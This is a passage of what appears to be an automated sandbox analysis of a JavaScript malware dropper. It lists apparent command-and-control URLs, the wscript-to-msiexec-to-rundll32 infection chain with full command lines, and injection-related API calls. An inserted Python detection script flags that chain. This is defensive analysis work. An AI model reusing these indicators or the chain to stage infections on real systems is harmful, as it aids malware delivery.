Source: explorer.exe, 00000008.00000002.3351439546.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/
Source: explorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/ECOMPARE.EXE.15Desktop
Source: explorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/eE
Source: explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352293048.000000000C642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352293048.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/
Source: explorer.exe, 00000008.00000002.3346806877.0000000009B41000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/3
Source: explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/G
Source: explorer.exe, 00000008.00000002.3352293048.000000000C81C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/M
Source: explorer.exe, 00000008.00000002.3346806877.00000000099B0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/i
Source: explorer.exe, 00000008.00000002.3352962994.000000000C933000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/test/l
Source: explorer.exe, 00000008.00000002.3353202323.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://isomicrotich.com/yEz
Source: explorer.exe, 00000008.00000002.3350911655.000000000B7DD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://opewolumeras.com/test/
Source: explorer.exe, 00000008.00000002.3350911655.000000000B7DD000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://opewolumeras.com/test/P
Source: explorer.exe, 00000008.00000000.2452717662.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.3346806877.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.3094015474.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000008.00000000.2456761349.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com/
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com/)
Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA37000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/
Source: rundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/$E
Source: rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/%
Source: rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/&
Source: rundll32.exe, 00000006.00000003.3036865447.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030485400.000001FF4CA7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/0E
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA42000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/8~
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/F
Source: rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/L
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/N
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/Q
Source: rundll32.exe, 00000006.00000003.2219769270.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/Y
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/admin.php.
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/admin.php=
Source: rundll32.exe, 00000006.00000003.2408323389.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2310895325.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030377151.000001FF4CA1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3036902410.000001FF4CA1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3149156557.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3332514374.000001FF4CA1D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3011956610.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2526611682.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/admin.phpM
Source: rundll32.exe, 00000006.00000003.2253330460.000001FF4CA15000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.3031010424.000001FF4CA63000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030079674.000001FF4CA4A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030899621.000001FF4CA52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030550060.000001FF4CA4D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3030793340.000001FF4CA4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://tiguanin.com:8041/oQ
Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000008.00000002.3346806877.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000008.00000000.2452717662.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: https://www.advancedinstaller.com
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: https://www.thawte.com/cps0/
Source: MSIF1BF.tmp.1.dr, MSI7623.tmp.1.dr, MSIF1DF.tmp.1.dr, MSIF101.tmp.1.dr, MSIF22E.tmp.1.dr, MSIF29D.tmp.1.dr, MSIF160.tmp.1.dr String found in binary or memory: https://www.thawte.com/repository0W
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50048
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50048 version: TLS 1.2
Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DirectInput8Create memstr_4797e325-3
Source: rundll32.exe, 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetRawInputData memstr_2984fdd2-5
Source: Yara match File source: 00000006.00000003.2067028655.000001FF4CAD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5880, type: MEMORYSTR

System Summary

Source: Document-18-33-08.js Static file information: Suspicious name
Source: C:\Windows\System32\wscript.exe COM Object queried: Microsoft Windows Installer HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C1090-0000-0000-C000-000000000046}
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CDACE NtReadFile, 6_3_000001FF4C9CDACE
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CD9FE NtOpenFile, 6_3_000001FF4C9CD9FE
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CDA6E NtProtectVirtualMemory, 6_3_000001FF4C9CDA6E
Source: C:\Windows\System32\rundll32.exe Code function: 6_3_000001FF4C9CD98E NtAllocateVirtualMemory, 6_3_000001FF4C9CD98E
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE7A50 NtSetContextThread, 6_2_000001FF4CAE7A50
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAEF3A0 CreateToolhelp32Snapshot,Thread32First,NtSuspendThread,NtResumeThread,Thread32Next,NtClose, 6_2_000001FF4CAEF3A0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD17B0 NtClose, 6_2_000001FF4CAD17B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04FF0 NtQueueApcThread, 6_2_000001FF4CB04FF0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04BE0 NtProtectVirtualMemory, 6_2_000001FF4CB04BE0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB03F40 NtAllocateVirtualMemory, 6_2_000001FF4CB03F40
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04740 NtFreeVirtualMemory, 6_2_000001FF4CB04740
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB04360 NtCreateThreadEx, 6_2_000001FF4CB04360
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE55C0 NtClose,NtTerminateThread, 6_2_000001FF4CAE55C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB051C0 NtReadVirtualMemory, 6_2_000001FF4CB051C0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD71B0 NtClose, 6_2_000001FF4CAD71B0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAD1600 NtClose,RtlExitUserThread, 6_2_000001FF4CAD1600
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CB045F0 NtDuplicateObject, 6_2_000001FF4CB045F0
Source: C:\Windows\System32\rundll32.exe Code function: 6_2_000001FF4CAE8149 NtSetContextThread, 6_2_000001FF4CAE8149
Source: C:\Windows\explorer.exe Code function: 8_2_0305C704 NtDelayExecution, 8_2_0305C704
Source: C:\Windows\explorer.exe Code function: 8_2_0305B388 NtAllocateVirtualMemory, 8_2_0305B388
Source: C:\Windows\explorer.exe Code function: 8_2_030582B4 NtFreeVirtualMemory, 8_2_030582B4
Source: C:\Windows\explorer.exe Code function: 8_2_030601A0 NtFreeVirtualMemory, 8_2_030601A0
Source: C:\Windows\explorer.exe Code function: 8_2_030581C8 NtWriteFile, 8_2_030581C8
Source: C:\Windows\explorer.exe Code function: 8_2_03058240 NtClose, 8_2_03058240
Source: C:\Windows\explorer.exe Code function: 8_2_030580B8 RtlInitUnicodeString,NtCreateFile, 8_2_030580B8
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7623.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF101.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF160.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1BF.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF1DF.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF22E.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIF29D.tmp
Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIF101.tmp
Source: C:\Windows\System32\rundll32.exe Code function: String function: 000000018004816C appears 44 times
Source: C:\Windows\System32\rundll32.exe Code function: String function: 0000000180001400 appears 56 times
Source: C:\Windows\Installer\MSIF29D.tmp Code function: String function: 00FD3790 appears 39 times
Source: C:\Windows\Installer\MSIF29D.tmp Code function: String function: 00FD325F appears 103 times
Source: C:\Windows\Installer\MSIF29D.tmp Code function: String function: 00FD3292 appears 70 times
Source: Document-18-33-08.js Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.spre.troj.evad.winJS@10/21@8/4
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle, 4_2_00FB3860
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error, 4_2_00FB4BA0
Source: C:\Windows\Installer\MSIF29D.tmp Code function: 4_2_00FB45B0 LoadResource,LockResource,SizeofResource, 4_2_00FB45B0
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\Microsoft\CMLF268.tmp
Source: C:\Windows\System32\rundll32.exe Mutant created: NULL
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\TEMP\~DF93ACB531B807E54B.TMP
Source: C:\Windows\Installer\MSIF29D.tmp File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js"
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSIF29D.tmp "C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: C:\Windows\Installer\MSIF29D.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState
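The process-creation lines above are the whole delivery chain: a script host running a .js from the Desktop, the Windows Installer service (msiexec /V) starting an -Embedding custom-action server, that server launching a helper dropped as C:\Windows\Installer\MSIF29D.tmp with /DontWait, and the helper handing a DLL from AppData\Roaming to rundll32 (the 32-bit rundll32 then re-executes as the 64-bit one because the DLL is x64). The following is an added example, not code from the report or from any vendor, of how a detection engineer would check process-creation telemetry for that chain. The events are constructed in a Sysmon-like shape: the images and command lines are the ones listed above, the PIDs and the benign control event are invented.

```python
import re

# Added example (not from the report): process-creation events in a Sysmon-like
# shape, constructed to mirror the chain listed above. PIDs are invented; the
# images and command lines are those the report shows. The last event is a
# benign control that must not fire.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document-18-33-08.js"'},
    {"pid": 200, "ppid": 2, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r"C:\Windows\syswow64\MsiExec.exe -Embedding 3D862CBB7D25098EF2F446AEAACF52B4"},
    {"pid": 220, "ppid": 200, "image": r"C:\Windows\Installer\MSIF29D.tmp",
     "cmdline": r'"C:\Windows\Installer\MSIF29D.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe '
                r'C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState'},
    {"pid": 230, "ppid": 220, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r'"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState'},
    {"pid": 240, "ppid": 230, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState'},
    {"pid": 300, "ppid": 1, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL"},
]

USER_WRITABLE = re.compile(r"(?i)\\users\\[^\\]+\\(appdata|desktop|downloads|documents)\\")
SCRIPT_FROM_PROFILE = re.compile(r'(?i)\\users\\[^\\]+\\(desktop|downloads|appdata)\\[^"]*\.(js|jse|vbs|vbe|wsf)\b')
INSTALLER_TMP = re.compile(r"(?i)\\windows\\installer\\msi[0-9a-f]+\.tmp$")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_script_host_from_profile(ev, by_pid):
    """wscript/cscript running a script file out of the user's profile."""
    return (basename(ev["image"]) in ("wscript.exe", "cscript.exe")
            and SCRIPT_FROM_PROFILE.search(ev["cmdline"]) is not None)


def rule_msiexec_runs_installer_tmp(ev, by_pid):
    """msiexec launching a custom-action helper dropped as MSI*.tmp under the Installer directory."""
    parent = by_pid.get(ev["ppid"])
    return (parent is not None and basename(parent["image"]) == "msiexec.exe"
            and INSTALLER_TMP.search(ev["image"]) is not None)


def rule_installer_tmp_spawns_child(ev, by_pid):
    """Anything spawned by an MSI*.tmp helper (here: rundll32 via /DontWait)."""
    parent = by_pid.get(ev["ppid"])
    return parent is not None and INSTALLER_TMP.search(parent["image"]) is not None


def rule_rundll32_user_writable_dll(ev, by_pid):
    """rundll32 told to load a DLL from a user-writable directory."""
    return (basename(ev["image"]) == "rundll32.exe"
            and USER_WRITABLE.search(ev["cmdline"]) is not None)


RULES = [rule_script_host_from_profile, rule_msiexec_runs_installer_tmp,
         rule_installer_tmp_spawns_child, rule_rundll32_user_writable_dll]


def lineage(ev, by_pid) -> str:
    """Walk ppid links back to the earliest ancestor we have an event for."""
    chain, seen = [], set()
    while ev is not None and ev["pid"] not in seen:
        seen.add(ev["pid"])
        chain.append(basename(ev["image"]))
        ev = by_pid.get(ev["ppid"])
    return " <- ".join(chain)


def analyse(events):
    """Run every rule over every event; each hit carries the full process lineage."""
    by_pid = {ev["pid"]: ev for ev in events}
    hits = []
    for ev in events:
        for rule in RULES:
            if rule(ev, by_pid):
                hits.append({"rule": rule.__name__, "pid": ev["pid"], "lineage": lineage(ev, by_pid)})
    return hits


if __name__ == "__main__":
    for hit in analyse(EVENTS):
        print(f"{hit['rule']:34} pid={hit['pid']:<4} {hit['lineage']}")
```

Each rule on its own is noisy in a real estate (installers legitimately run MSI*.tmp helpers, and some software does start rundll32 on a DLL in AppData); the value is in the lineage string attached to each hit, which lets a triage query require two or more of these conditions on one ancestry before paging anyone.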
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: webio.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
